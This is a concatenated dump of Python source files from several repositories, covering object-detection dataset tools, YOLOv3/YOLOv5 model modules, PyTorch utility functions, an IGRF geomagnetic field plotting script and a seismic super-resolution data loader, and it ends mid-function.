for object_name, value in classes_num_dict.items():
print("\t%s: %d" % (object_name, value))
print("\tAll: %d" % sum(classes_num_dict.values()))
def show_dataset(self, pkl_fname, colors_map=None, random=False):
"""展示数据集,一张张展示
:param pkl_fname: str
:param colors_map: Dict / List
:param random: bool
:return: None
"""
images_dir = self.images_dir
labels_map = self.labels_map
pkl_path = os.path.join(self.pkl_dir, pkl_fname)
# --------------------
image_fname_list, target_list = load_from_pickle(pkl_path)
if random:
orders = np.random.permutation(range(len(image_fname_list)))
else:
orders = range(len(image_fname_list))
        for i in orders:  # possibly shuffled order
            # 1. data
            img_fname = image_fname_list[i]
            target = target_list[i]
            img_path = os.path.join(images_dir, img_fname)
            # 2. open the image
image = imread(img_path)
draw_target_in_image(image, target, colors_map, labels_map)
image = resize_max(image, 720, 1080)
cv.imshow("%s" % img_fname, image)
cv.waitKey(0)
cv.destroyWindow("%s" % img_fname)
def concat_pickle(self, processor_list, old_pkl_fname_list, new_pkl_fname=None, prefix_list=None):
"""合并pickle. 图片、新pickle会合并到第一个中. (no$, 未测试, 可能存在bug)
:param processor_list: List[Processor]. 不包括self
:param old_pkl_fname_list: List[str]
:param new_pkl_fname: str = "images_targets_concat.pkl".
:param prefix_list: List[str]
"""
        # 1. process the inputs
processor_list.insert(0, self)
new_pkl_fname = new_pkl_fname or "images_targets_concat.pkl"
new_pkl_path = os.path.join(self.pkl_dir, new_pkl_fname)
if not self.exist_ok and os.path.exists(new_pkl_path):
raise FileExistsError("%s is exists" % new_pkl_path)
if prefix_list is None:
prefix_list = []
for i in range(len(processor_list)):
prefix_list.append("_" * i)
# ------------------------------------------
old_pkl_path_list, old_images_dir_list = [], []
for i, processor in enumerate(processor_list):
old_images_dir_list.append(processor.images_dir)
old_pkl_path_list.append(os.path.join(processor.pkl_dir, old_pkl_fname_list[i]))
new_images_dir = old_images_dir_list[0]
new_image_fname_list, new_target_list = [], []
for old_images_dir, old_pkl_path, prefix in \
zip(old_images_dir_list, old_pkl_path_list, prefix_list):
old_image_fname_list, old_target_list = load_from_pickle(old_pkl_path)
            # 1. extend target_list
new_target_list += old_target_list
            # 2. copy the images and update image_fname_list
for i, image_fname in enumerate(old_image_fname_list):
                # update image_fname_list
new_image_fname = prefix + image_fname
new_image_fname_list.append(new_image_fname)
                # copy the image
if prefix != "":
old_path = os.path.join(old_images_dir, image_fname)
new_path = os.path.join(new_images_dir, new_image_fname)
shutil.copyfile(old_path, new_path)
print("\r>> %d / %d" % (i + 1, len(old_image_fname_list)), end="")
print()
        # 3. save
save_to_pickle((new_image_fname_list, new_target_list), new_pkl_path)
print("-------------------------------------------------")
print("Concat:")
self.test_dataset(new_pkl_fname)
def _get_data_from_xml(self, xml_fname):
"""get img_fname, target from xml. 并检测图片已经存在
:param xml_fname: str
:return: tuple(img_fname, target: dict("boxes": Tensor[NUM, 4], "labels": Tensor[NUM]))"""
images_dir = self.images_dir
annos_dir = self.annos_dir
category = self.category
        # 1. get the file names
image_fname = xml_fname.replace(".xml", ".jpg")
image_path = os.path.join(images_dir, image_fname)
anno_path = os.path.join(annos_dir, xml_fname)
        # 2. check that the image exists
        if not os.path.exists(image_path):  # image does not exist
raise FileNotFoundError("%s not found" % image_path)
        # 3. read the annotation data
with open(anno_path, "r", encoding="utf-8") as f:
text = f.read()
data_list = re.findall( # len(NUMi, 5(object_name, left, top, right, bottom))
r"<name>\s*(\w*?)\s*</name>.*?"
r"<xmin>\s*(\d*?)\s*</xmin>.*?<ymin>\s*(\d*?)\s*</ymin>.*?"
r"<xmax>\s*(\d*?)\s*</xmax>.*?<ymax>\s*(\d*?)\s*</ymax>",
text, re.DOTALL)
        if len(data_list) == 0:  # no boxes
print("| no target in %s. but we still put it in" % image_fname)
        # 4. process the data
box_list, label_list = [], [] # len(NUMi, 4), len(NUMi)
for object_name, left, top, right, bottom in data_list:
            label = category.get(object_name)  # whether object_name exists in category. label: int
            if label is None:  # target name not in category
raise ValueError("`%s` not in category. path: %s" % (object_name, anno_path))
if label == -1:
continue
            box_list.append([int(left), int(top), int(right), int(bottom)])  # int() tolerates surrounding whitespace in the strings
label_list.append(label)
        # 5. convert data types
target = {
"boxes": torch.tensor(box_list, dtype=torch.float32).reshape(-1, 4),
"labels": torch.tensor(label_list, dtype=torch.long).reshape(-1)
}
return image_fname, target
def split_train_test_from_pickle(self, total_pkl_fname, test_num=1000,
train_pkl_fname=None, test_pkl_fname=None):
"""将pickle分为训练集和测试集
:param total_pkl_fname: str
:param test_num: int. 测试集数量(图片张数)
:param train_pkl_fname: str = "images_targets_train.pkl"
:param test_pkl_fname: str = "images_targets_test.pkl"
:return: None
"""
train_pkl_fname = train_pkl_fname or "images_targets_train.pkl"
test_pkl_fname = test_pkl_fname or "images_targets_test.pkl"
total_pkl_path = os.path.join(self.pkl_dir, total_pkl_fname)
train_pkl_path = os.path.join(self.pkl_dir, train_pkl_fname)
test_pkl_path = os.path.join(self.pkl_dir, test_pkl_fname)
if not self.exist_ok and (os.path.exists(train_pkl_path) or os.path.exists(test_pkl_path)):
raise FileExistsError("%s or %s is exists" % (train_pkl_path, test_pkl_path))
total_image_fname_list, total_target_list = load_from_pickle(total_pkl_path)
# shuffle
total_image_fname_list = np.stack(total_image_fname_list, 0)
total_target_fname_list = np.stack(total_target_list, 0)
shuffle_order = np.random.permutation(len(total_image_fname_list))
train_order = shuffle_order[:-test_num]
test_order = shuffle_order[-test_num:]
# 3. Split
# training set
train_image_fname_list = list(total_image_fname_list[train_order])
train_target_list = list(total_target_fname_list[train_order])
# test set
test_image_fname_list = list(total_image_fname_list[test_order])
test_target_list = list(total_target_fname_list[test_order])
save_to_pickle((train_image_fname_list, train_target_list), train_pkl_path)
save_to_pickle((test_image_fname_list, test_target_list), test_pkl_path)
print("-------------------------------------------------")
print("Train:")
self.test_dataset(train_pkl_fname)
print("-------------------------------------------------")
print("Test:")
self.test_dataset(test_pkl_fname)
def make_mini_dataset(self, total_pkl_fname, dataset_num=1000, mini_pkl_fname=None):
"""制作小数据集
:param total_pkl_fname: str
:param dataset_num: int. 数据集数量(图片张数)
:param mini_pkl_fname: str = "images_targets_mini.pkl"
:return: None
"""
mini_pkl_fname = mini_pkl_fname or "images_targets_mini.pkl"
total_pkl_path = os.path.join(self.pkl_dir, total_pkl_fname)
mini_pkl_path = os.path.join(self.pkl_dir, mini_pkl_fname)
if not self.exist_ok and os.path.exists(mini_pkl_path):
raise FileExistsError("%s is exists" % mini_pkl_path)
total_image_fname_list, total_target_list = load_from_pickle(total_pkl_path)
# shuffle
total_image_fname_list = np.stack(total_image_fname_list, 0)
total_target_fname_list = np.stack(total_target_list, 0)
shuffle_order = np.random.permutation(len(total_image_fname_list))
mini_order = shuffle_order[:dataset_num]
# 3. Slice
# mini set
mini_image_fname_list = list(total_image_fname_list[mini_order])
mini_target_list = list(total_target_fname_list[mini_order])
save_to_pickle((mini_image_fname_list, mini_target_list), mini_pkl_path)
print("-------------------------------------------------")
print("Mini:")
self.test_dataset(mini_pkl_fname)
def hflip_from_pickle(self, old_pkl_fname, new_pkl_fname=None, prefix="-"):
"""将images, 以及pickle进行水平翻转
:param old_pkl_fname: str
:param new_pkl_fname: str = "images_targets_hflip.pkl".
:param prefix: str. 加上前缀
:return: None
"""
new_pkl_fname = new_pkl_fname or "images_targets_hflip.pkl"
old_pkl_path = os.path.join(self.pkl_dir, old_pkl_fname)
new_pkl_path = os.path.join(self.pkl_dir, new_pkl_fname)
if not self.exist_ok and os.path.exists(new_pkl_path):
raise FileExistsError("%s is exists" % new_pkl_path)
image_fname_list, target_list = load_from_pickle(old_pkl_path) # appended to directly
image_fname_len = len(image_fname_list) # original length
for i in range(image_fname_len):
image_fname, target = image_fname_list[i], target_list[i]
old_path = os.path.join(self.images_dir, image_fname)
new_image_fname = prefix + image_fname
new_path = os.path.join(self.images_dir, new_image_fname)
with Image.open(old_path) as image:
image, target = hflip_image(image, target) # flip the image
if not self.exist_ok and os.path.exists(new_path):
raise FileExistsError("%s is exists" % new_path)
image.save(new_path)
image_fname_list.append(new_image_fname)
target_list.append(target)
print("\r>> %d / %d" % (i + 1, image_fname_len), end="")
print()
# 3. Save
save_to_pickle((image_fname_list, target_list), new_pkl_path)
print("-------------------------------------------------")
print("HFlip:")
self.test_dataset(new_pkl_fname)
``` |
{
"source": "Jintao-Huang/torch_study",
"score": 3
} |
#### File: dev/torch/corrcoef.py
```python
import torch
from torch import Tensor
from . import cov
def corrcoef(input: Tensor) -> Tensor:
"""
:param input: shape[N, M]
:return: shape[N, N]. symmetric matrix with ones on the diagonal
"""
x_cov = cov(input) # [N, N]
x_std = torch.sqrt(torch.diag(x_cov)) # [N]
x_corr = x_cov / (x_std[:, None] * x_std[None])
return x_corr
```
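A quick sanity check for the formula above (an illustrative sketch, not part of the repository; it uses `numpy.cov` as a stand-in for the repo's `cov` helper and compares against `numpy.corrcoef`):
```python
import torch
import numpy as np

x = torch.randn(3, 100)                      # [N, M]: 3 variables, 100 observations
x_cov = torch.from_numpy(np.cov(x.numpy()))  # stand-in for the repo's cov(input)
x_std = torch.sqrt(torch.diag(x_cov))        # per-variable standard deviation
x_corr = x_cov / (x_std[:, None] * x_std[None])

ref = torch.from_numpy(np.corrcoef(x.numpy()))
assert torch.allclose(x_corr, ref, atol=1e-6)  # symmetric, ones on the diagonal
```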
#### File: nn/functional/linear.py
```python
import torch
from torch import Tensor
"""
- matrix multiplication time complexity: e.g. [A, B] @ [B, C] is Ot(ABC)
- linear time complexity: Ot(N*In*Out)
"""
def linear(input: Tensor, weight: Tensor, bias: Tensor = None) -> Tensor:
"""
:param input: shape[N, In]
:param weight: shape[Out, In]
:param bias: shape[Out]
:return: shape[N, Out]"""
x = input
#
y = x @ weight.T # Ot(N*In*Out)
if bias is not None:
y += bias # Ot(N*Out)
return y
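# Illustrative usage (a sketch, not part of the repo) showing the shapes from the docstring:
#   x = torch.randn(8, 16)    # [N, In]
#   w = torch.randn(32, 16)   # [Out, In]
#   b = torch.randn(32)       # [Out]
#   y = linear(x, w, b)       # [N, Out]; matches torch.nn.functional.linear(x, w, b)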
``` |
{
"source": "Jintao-Huang/YOLOv3_PyTorch",
"score": 2
} |
#### File: YOLOv3_PyTorch/models/backbone.py
```python
import torch
from .utils import IntermediateLayerGetter
from .darknet53 import darknet53
import torch.nn as nn
from collections import OrderedDict
from .fpn import FPN
class Darknet53WithFPN(nn.Sequential):
def __init__(self, pretrained_backbone, out_anchors, num_classes, backbone_norm_layer, fpn_norm_layer):
backbone = darknet53(pretrained_backbone, norm_layer=backbone_norm_layer)
return_layers = {"layer3": "P3", "layer4": "P4", "layer5": "P5"}
in_channels_list = (256, 512, 1024) # P3 P4 P5
super(Darknet53WithFPN, self).__init__(OrderedDict({
"body": IntermediateLayerGetter(backbone, return_layers),
"fpn": FPN(in_channels_list, out_anchors, num_classes, fpn_norm_layer)
}))
``` |
{
"source": "Jintao-Huang/yolov5_PyTorch",
"score": 2
} |
#### File: Jintao-Huang/yolov5_PyTorch/make_dataset.py
```python
from utils.detection.xml_processor import XMLProcessor
from utils.utils import load_from_pickle, save_to_pickle
import os
def make_dataset(imgs_dir, annos_dir, pkl_path, imgs_set_path, labels="voc", show_dataset=False):
"""
:param imgs_dir: str
:param annos_dir: str
:param pkl_path: str
:param imgs_set_path: str
:param labels: str["coco", "voc"] or list[str] or Dict[str: int], many-to-one mapping allowed
:param show_dataset: bool
:return:
"""
pkl_dir = os.path.dirname(pkl_path)
os.makedirs(pkl_dir, exist_ok=True)
xml_processor = XMLProcessor(imgs_dir, annos_dir, labels, imgs_set_path, True)
if os.path.exists(pkl_path):
img_path_list, target_list = load_from_pickle(pkl_path)
xml_processor.img_path_list, xml_processor.target_list = img_path_list, target_list
xml_processor.test_dataset()
else:
xml_processor.create_labels_cache()
xml_processor.test_dataset()
save_to_pickle((xml_processor.img_path_list, xml_processor.target_list), pkl_path)
img_path_list, target_list = xml_processor.img_path_list, xml_processor.target_list
if show_dataset:
xml_processor.show_dataset()
return img_path_list, target_list
if __name__ == "__main__":
make_dataset(r"D:\datasets\VOCdevkit\VOC0712\JPEGImages",
r"D:\datasets\VOCdevkit\VOC0712\Annotations",
r"D:\datasets\VOCdevkit\VOC0712\pkl\voc_0712_test.pkl",
r"D:\datasets\VOCdevkit\VOC0712\ImageSets\Main\test.txt", "voc", True)
make_dataset(r"D:\datasets\VOCdevkit\VOC0712\JPEGImages",
r"D:\datasets\VOCdevkit\VOC0712\Annotations",
r"D:\datasets\VOCdevkit\VOC0712\pkl\voc_0712_trainval.pkl",
r"D:\datasets\VOCdevkit\VOC0712\ImageSets\Main\trainval.txt", "voc", True)
```
#### File: yolov5_PyTorch/models/backbone.py
```python
import torch.nn as nn
from .common import Focus, ConvBnSiLU, C3, SPP
__all__ = ["YOLOv5Backbone"]
class YOLOv5Backbone(nn.Module):
def __init__(self):
super(YOLOv5Backbone, self).__init__()
self.layer1 = Focus(3, 32, 3, 1, 1) # 0
self.layer2 = nn.Sequential(
ConvBnSiLU(32, 64, 3, 2, 1, True), # 1
C3(64, 64, 1, True, 0.5) # 2
)
self.layer3 = nn.Sequential(
ConvBnSiLU(64, 128, 3, 2, 1, True), # 3
C3(128, 128, 3, True, 0.5) # 4
)
self.layer4 = nn.Sequential(
ConvBnSiLU(128, 256, 3, 2, 1, True), # 5
C3(256, 256, 3, True, 0.5) # 6
)
self.layer5 = nn.Sequential(
ConvBnSiLU(256, 512, 3, 2, 1, True), # 7
SPP(512, 512, (5, 9, 13)), # 8
C3(512, 512, 1, False, 0.5) # 9
)
def forward(self, x):
output = []
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
output.append(x)
x = self.layer4(x)
output.append(x)
x = self.layer5(x)
output.append(x)
return output # [x_3, x_4, x_5]
```
#### File: yolov5_PyTorch/models/common.py
```python
import torch.nn as nn
import torch
class ConvBnSiLU(nn.Module):
# Standard convolution
def __init__(self, in_channels, out_channels,
kernel_size, stride, padding, activation=True):
super(ConvBnSiLU, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, bias=False)
self.bn = nn.BatchNorm2d(out_channels, 1e-3, 0.03)
self.act = nn.SiLU(inplace=True) if activation else nn.Identity()
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.act(x)
return x
def fuse_forward(self, x):
x = self.conv(x)
x = self.act(x)
return x
class Bottleneck(nn.Module):
# Standard bottleneck
def __init__(self, in_channels, out_channels, shortcut=True, expansion=0.5):
super(Bottleneck, self).__init__()
neck = int(out_channels * expansion)
self.conv1 = ConvBnSiLU(in_channels, neck, 1, 1, 0, True)
self.conv2 = ConvBnSiLU(neck, out_channels, 3, 1, 1, True)
self.shortcut = shortcut and in_channels == out_channels
def forward(self, x):
x0 = x
x = self.conv1(x)
x = self.conv2(x)
x = (x0 + x) if self.shortcut else x
return x
class C3(nn.Module):
# CSP Bottleneck with 3 convolutions
def __init__(self, in_channels, out_channels, repeat=1, shortcut=True, expansion=0.5):
super(C3, self).__init__()
neck = int(out_channels * expansion)
self.conv1 = ConvBnSiLU(in_channels, neck, 1, 1, 0, True)
self.conv2 = ConvBnSiLU(in_channels, neck, 1, 1, 0, True)
self.bottleneck_n = nn.Sequential(*[Bottleneck(neck, neck, shortcut, 1.0) for _ in range(repeat)])
self.conv3 = ConvBnSiLU(2 * neck, out_channels, 1, 1, 0, True)
def forward(self, x):
x1 = self.conv1(x)
x1 = self.bottleneck_n(x1)
x2 = self.conv2(x)
x = torch.cat([x1, x2], dim=1)
x = self.conv3(x)
return x
class SPP(nn.Module):
# Spatial pyramid pooling layer used in YOLOv3-SPP
def __init__(self, in_channels, out_channels, kernel_size_list=(5, 9, 13)):
super(SPP, self).__init__()
neck = in_channels // 2
self.conv1 = ConvBnSiLU(in_channels, neck, 1, 1, 0)
self.conv2 = ConvBnSiLU(neck * (len(kernel_size_list) + 1), out_channels, 1, 1, 0)
self.max_pool_list = nn.ModuleList(
[nn.MaxPool2d(kernel_size, 1, kernel_size // 2) for kernel_size in kernel_size_list])
def forward(self, x):
x = self.conv1(x)
x0 = x
x = [max_pool(x) for max_pool in self.max_pool_list]
x = torch.cat([x0] + x, 1)
x = self.conv2(x)
return x
class Focus(nn.Module):
# Focus wh information into c-space
def __init__(self, in_channels, out_channels, kernel_size, stride, padding, activation=True):
super(Focus, self).__init__()
self.conv = ConvBnSiLU(in_channels * 4, out_channels, kernel_size, stride, padding, activation)
def forward(self, x):
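# space-to-depth: [N, C, H, W] -> [N, 4C, H/2, W/2] by stacking the four interleaved pixel grids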
x = torch.cat([x[:, :, ::2, ::2], x[:, :, 1::2, ::2], x[:, :, ::2, 1::2], x[:, :, 1::2, 1::2]], 1)
x = self.conv(x)
return x
class Concat(nn.Module):
# Concatenate a list of tensors along dimension
def __init__(self, dim=1):
super(Concat, self).__init__()
self.dim = dim
def forward(self, x):
return torch.cat(x, self.dim)
```
#### File: yolov5_PyTorch/models/fpn.py
```python
import torch.nn as nn
from .common import Concat, ConvBnSiLU, C3
__all__ = ["PANet"]
class PANet(nn.Module):
def __init__(self):
super(PANet, self).__init__()
self.conv_list = nn.ModuleList([
ConvBnSiLU(512, 256, 1, 1, 0, True), # 10
ConvBnSiLU(256, 128, 1, 1, 0, True), # 14
])
# kept as separate modules (not merged) to preserve the original model structure
self.up_list = nn.ModuleList([
nn.Upsample(scale_factor=2., mode="nearest"), # 11
nn.Upsample(scale_factor=2., mode="nearest") # 15
])
self.down_list = nn.ModuleList([
ConvBnSiLU(128, 128, 3, 2, 1, True), # 18
ConvBnSiLU(256, 256, 3, 2, 1, True) # 21
])
self.cat_list = nn.ModuleList([
Concat(1), # 12
Concat(1), # 16
Concat(1), # 19
Concat(1) # 22
])
self.C3_list = nn.ModuleList([
C3(512, 256, 1, False, 0.5), # 13
C3(256, 128, 1, False, 0.5), # 17
C3(256, 256, 1, False, 0.5), # 20
C3(512, 512, 1, False, 0.5) # 23
])
def forward(self, x):
x_3, x_4, x_5 = x
x_5 = self.conv_list[0](x_5)
x_4 = self.cat_list[0]([self.up_list[0](x_5), x_4])
x_4 = self.conv_list[1](self.C3_list[0](x_4))
x_3 = self.cat_list[1]([self.up_list[1](x_4), x_3])
x_3 = self.C3_list[1](x_3)
x_4 = self.cat_list[2]([self.down_list[0](x_3), x_4])
x_4 = self.C3_list[2](x_4)
x_5 = self.cat_list[3]([self.down_list[1](x_4), x_5])
x_5 = self.C3_list[3](x_5)
return x_3, x_4, x_5
```
#### File: utils/detection/tester.py
```python
from torch.utils.data import DataLoader
import torch
import math
class Tester:
def __init__(self, model, test_dataset, batch_size, device, ap_counter, test_samples=1000,
score_thresh=0.5, nms_thresh=0.5):
self.model = model.to(device)
self.test_loader = DataLoader(test_dataset, batch_size, True, collate_fn=collate_fn, pin_memory=True)
self.device = device
self.num_samples = len(test_dataset)
self.batch_size = batch_size
self.ap_counter = ap_counter
self.test_step = math.ceil(test_samples / batch_size)
self.score_thresh = score_thresh
self.nms_thresh = nms_thresh
def test(self, total=False):
self.model.eval()
self.ap_counter.init_table()
with torch.no_grad():
for i, (x, y) in enumerate(self.test_loader):
x, y = to(x, y, self.device)
pred = self.model(x, score_thresh=self.score_thresh, nms_thresh=self.nms_thresh)
self.ap_counter.add(pred, y)
if not total and i + 1 == self.test_step:
break
ap_dict = self.ap_counter.get_ap_dict()
self._print_mes(i + 1, ap_dict)
self.ap_counter.init_table() # clear memory
return ap_dict
def _print_mes(self, steps, ap_dict):
test_num_samples = min(steps * self.batch_size, self.num_samples)
print("Test | Samples: %d/%d (%.2f%%)" %
(test_num_samples, self.num_samples,
test_num_samples / self.num_samples * 100))
self.ap_counter.print_ap(ap_dict)
```
#### File: utils/detection/xml_processor.py
```python
import os
import numpy as np
import cv2 as cv
from ..display import imread, draw_target_in_image, resize_max, coco_labels, voc_labels
import xml.etree.ElementTree as ET
from models.utils import ltrb2cxcywh, cxcywh2ltrb
from copy import deepcopy
class XMLProcessor:
"""$"""
def __init__(self, imgs_dir, annos_dir, labels="voc", imgs_set_path=None, verbose=True):
"""
:param imgs_dir: str
:param annos_dir: str
:param labels: str["coco", "voc"] or list[str] or Dict[str: int], many-to-one mapping allowed
:param imgs_set_path: str. txt file listing the image set
"""
self.imgs_dir = imgs_dir
self.annos_dir = annos_dir
self.imgs_set_path = imgs_set_path
if labels == "voc":
labels = voc_labels
elif labels == "coco":
labels = coco_labels
if isinstance(labels, list):
labels = dict(zip(labels, range(len(labels))))
self.labels_str2int = labels
self.labels_int2str = dict(zip(labels.values(), labels.keys())) # entries with value < 0 are ignored
self.img_path_list = [] # List[str]
# List[ndarray[X, 5], Tuple[W, H]]. [cls, *xywh]
self.target_list = []
self.verbose = verbose
def create_labels_cache(self):
"""解析xmls.
:return: None. 缓存见self.img_path_list, self.target_list
"""
print("create labels cache...")
img_path_list = [] # List[str]
target_list = [] # List[ndarray[X, 5], Tuple[W, H]]. [cls, *xywh]
if self.imgs_set_path:
with open(self.imgs_set_path, "r") as f:
annos_fname_list = ["%s.xml" % x.rstrip('\n') for x in f]
else:
annos_fname_list = os.listdir(self.annos_dir)
annos_path_list = [os.path.join(self.annos_dir, fname) for fname in annos_fname_list]
for i, annos_path in enumerate(annos_path_list):
img_path, target = self._get_data_from_xml(annos_path)
img_path_list.append(os.path.join(self.imgs_dir, img_path))
target_list.append(target)
self.img_path_list = img_path_list
self.target_list = target_list
def _get_data_from_xml(self, anno_path):
"""get img_path, target from xml.
Checks: (the image file exists, each image has at least one target, target names are in labels.)
:param anno_path: str
:return: Tuple[img_path, target: List[ndarray[X, 5], Tuple[W, H]]. [cls, *xywh]]"""
# 1. Build the image path
img_path = os.path.join(self.imgs_dir, os.path.basename(anno_path).replace(".xml", ".jpg"))
# 2. Check that the image exists
img = cv.imread(img_path)
assert img is not None, "image not found. path: %s" % img_path
w, h = img.shape[1], img.shape[0]
# 3. Read the annotation data
with open(anno_path, "r", encoding="utf-8") as f:
text = f.read()
# [cls, *xywh]
xml_tree = ET.parse(anno_path)
data_list = list(zip(
xml_tree.findall(".//object/name"),
xml_tree.findall(".//object/bndbox/xmin"),
xml_tree.findall(".//object/bndbox/ymin"),
xml_tree.findall(".//object/bndbox/xmax"),
xml_tree.findall(".//object/bndbox/ymax"),
))
if len(data_list) == 0: # no boxes
print("| no target. but we still put it in. path: %s" % img_path) if self.verbose else None
# 4. Process the data
target_list = [] # len(NUMi, 4), len(NUMi)
for obj_name, left, top, right, bottom in data_list:
label = self.labels_str2int.get(obj_name.text) # whether obj_name exists in labels. label: int
if label is None: # object name not in labels
print("`%s` not in labels. path: %s" % (obj_name.text, anno_path)) if self.verbose else None
continue
if label == -1:
continue
target_list.append([label, int(left.text), int(top.text), int(right.text), int(bottom.text)])
# 5. Convert data types. Normalize the target
target = np.array(target_list, dtype=np.float32) # [X, 5]
target[:, 1:] = ltrb2cxcywh(target[:, 1:])
target[:, 1::2] /= w # lr
target[:, 2::2] /= h # tb
target = [target, (w, h)]
return img_path, target
def test_dataset(self):
"""测试pickle文件(输出总图片数、各个分类的目标数).
:return: None
"""
print("-------------------------------------------------")
print("imgs数量: %d" % len(self.img_path_list))
print("targets数量: %d" % len(self.target_list))
# count the number of targets per class
# 1. initialize classes_num_dict
classes_num_dict = {label_name: 0 for label_name in self.labels_int2str.values()}
# 2. accumulate
for target in self.target_list: # iterate over each image
for label in target[0][:, 0]:
classes_num_dict[self.labels_int2str[int(label)]] += 1
# 3. print
print("classes_num:")
for obj_name, value in classes_num_dict.items():
print("\t%s: %d" % (obj_name, value))
print("\tAll: %d" % sum(classes_num_dict.values()), flush=True)
def show_dataset(self, random=False, colors=None):
"""展示数据集,一张张展示
:param random: bool
:param colors: Dict / List
:return: None
"""
target_list = deepcopy(self.target_list)
if random:
orders = np.random.permutation(range(len(self.img_path_list)))
else:
orders = range(len(self.img_path_list))
for i in orders: # possibly shuffled order
# 1. Unpack the data
img_path = self.img_path_list[i]
img_fname = os.path.basename(img_path)
target, (w, h) = target_list[i]
labels = target[:, 0]
boxes = target[:, 1:]
boxes = cxcywh2ltrb(boxes)
boxes[:, 0::2] *= w # lr
boxes[:, 1::2] *= h # tb
# 2. Open the image
img = imread(img_path)
draw_target_in_image(img, boxes, labels, None, self.labels_int2str, colors)
img = resize_max(img, 720, 1080)
cv.imshow("%s" % img_fname, img)
cv.waitKey(0)
cv.destroyWindow("%s" % img_fname)
```
#### File: yolov5_PyTorch/utils/utils.py
```python
import pickle
import hashlib
import torch
import numpy as np
from torch.backends import cudnn
def save_to_pickle(data, filepath):
"""$"""
with open(filepath, "wb") as f:
pickle.dump(data, f)
def load_from_pickle(filepath):
"""$"""
with open(filepath, "rb") as f:
obj = pickle.load(f)
return obj
def calculate_hash(filepath):
with open(filepath, "rb") as f:
buffer = f.read()
sha256 = hashlib.sha256()
sha256.update(buffer)
digest = sha256.hexdigest()
return digest[:8]
def set_seed(seed=0):
"""网络重现"""
torch.manual_seed(seed)
np.random.seed(seed)
# remove the randomness introduced by cudnn's reduced-precision acceleration
cudnn.deterministic = True
# cudnn.benchmark = True # if benchmark == True, deterministic will be False
def save_params(model, filepath):
torch.save(model.state_dict(), filepath)
def load_params(model, filepath, prefix="", drop_layers=(), strict=True):
"""
:param model: modified in place
:param filepath: str
:param prefix: prefix added to the keys of the pth state_dict. e.g. "backbone."
:param drop_layers: keys (after the prefix is added) to drop from the pth. e.g. "head"
:param strict: bool
"""
load_state_dict = torch.load(filepath)
# 1. add the prefix
if prefix:
for key in list(load_state_dict.keys()):
load_state_dict[prefix + key] = load_state_dict.pop(key)
# 2. drop
for key in list(load_state_dict.keys()):
for layer in drop_layers:
if layer in key:
load_state_dict.pop(key)
break
return model.load_state_dict(load_state_dict, strict)
def load_params_by_order(model, filepath, strict=True):
"""The parameter name of the pre-training model is different from the parameter name of the model"""
load_state_dict = torch.load(filepath)
# --------------------- algorithm
load_keys = list(load_state_dict.keys())
model_keys = list(model.state_dict().keys())
assert len(load_keys) == len(model_keys)
# by order
for load_key, model_key in zip(load_keys, model_keys):
load_state_dict[model_key] = load_state_dict.pop(load_key)
return model.load_state_dict(load_state_dict, strict)
``` |
{
"source": "JintaoLee-Roger/IGRF",
"score": 2
} |
#### File: JintaoLee-Roger/IGRF/igrfcode.py
```python
from constant import *
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
import scipy.special as scp
from pathlib import Path
import imageio
import os
import os.path
class IGRF:
def readdata(self, filename):
# read the data
G = []
n = []
m = []
data = np.zeros((195, 25))
with open(filename) as f:
lines = f.readlines()
i = 0
for line in lines:
lineData = line.strip().split()
G.append(lineData[0])
n.append(int(lineData[1]))
m.append(int(lineData[2]))
data[i,:] = lineData[3:]
i = i + 1
g = np.zeros(N1)
for i in range(N1):
g[i] = 0 if G[i] == 'g' else np.pi/2
return g, n, m, data
def V(self, g, n, m, data):
# compute the non-dipole field
ans = np.zeros(shapex)
for i in range(N2):
for j in range(N1):
if n[j] == 1:
# skip the dipole (n = 1) terms
continue
e = 1 if m[j] == 0 else 2
ans[:,:,i] = ans[:,:,i] - (-1)**(m[j])*(n[j]+1) * data[j,i]*np.cos(m[j]*Phi-g[j]) * \
(e * factorial(n[j]-m[j]) / factorial(n[j]+m[j]))**0.5 * \
(scp.lpmv(m[j], n[j], np.cos(Theta)))
ans.tofile('data.dat', sep = ' ', format = '%f')
def drawpicture(self, path, save = False):
# plot
plt.ion()
# load the generated data
result = np.fromfile('data.dat', dtype = float, sep = ' ').reshape(shapex)
# figure size
fig = plt.figure(figsize=(10,7))
ax1 = fig.add_axes([0.1,0.1,0.85,0.85])
for index in range(N2):
plt.cla()
plt.title('IGRF--'+str(1900+index*5))
# draw the world map
map = Basemap(ax = ax1)
map.drawcoastlines()
map.drawparallels(np.arange(-90,90,20),labels=[1,0,0,1])
map.drawmeridians(np.arange(-180,180,30),labels=[1,0,0,1])
# draw contour lines
X,Y = map(Phi, Theta)
map.contour(X*t, 90 - Y*t, result[:,:,index], 15)
# save the non-dipole field map for each epoch
if save:
filename = 'IGRF--'+str(1900+index*5)+'.png'
plt.savefig(path+filename)
plt.pause(0.1)
plt.ioff()
plt.show()
def creategif(self, path, gif_name):
# combine the png images into an animated gif
frames = []
pngFiles = os.listdir(path)
image_list = [os.path.join(path, f) for f in pngFiles]
for image_name in image_list:
# read the png image file
frames.append(imageio.imread(image_name))
# save as gif
imageio.mimsave(gif_name, frames, 'GIF', duration = 0.3)
if __name__ == '__main__':
g, n, m, data = IGRF().readdata('igrf12coeffs.txt')
file = Path('data.dat')
if not file.is_file():
# compute once to avoid recomputation
IGRF().V(g, n, m, data)
path = 'D:/Learn/python/IGRF/pngfile/'
IGRF().drawpicture(path, save=True)
IGRF().creategif(path, 'IGRF.gif')
``` |
{
"source": "JintaoLee-Roger/SeismicSuperResolution",
"score": 3
} |
#### File: src/data/__init__.py
```python
from data import srdata
from torch.utils.data import dataloader
class Data:
def __init__(self, args):
self.loader_train = None
if not args.test_only:
train_set = srdata.SRData(args, train=True)
self.loader_train = dataloader.DataLoader(
train_set, batch_size=args.batch_size,
shuffle=True, pin_memory=not args.cpu,
num_workers=args.n_threads
)
test_set = srdata.SRData(args, train=False)
self.loader_test = dataloader.DataLoader(
test_set, batch_size=1,
shuffle=False, pin_memory=not args.cpu,
num_workers=args.n_threads
)
```
#### File: src/model/unet.py
```python
import torch.nn as nn
import torch
from model import common
def conv(in_f, out_f, kernel_size, stride=1, bias=True, pad='zero', downsample_mode='stride'):
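# builds a Sequential of [optional ReflectionPad2d] -> Conv2d -> [optional AvgPool2d/MaxPool2d downsampler]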
downsampler = None
if stride != 1 and downsample_mode != 'stride':
if downsample_mode == 'avg':
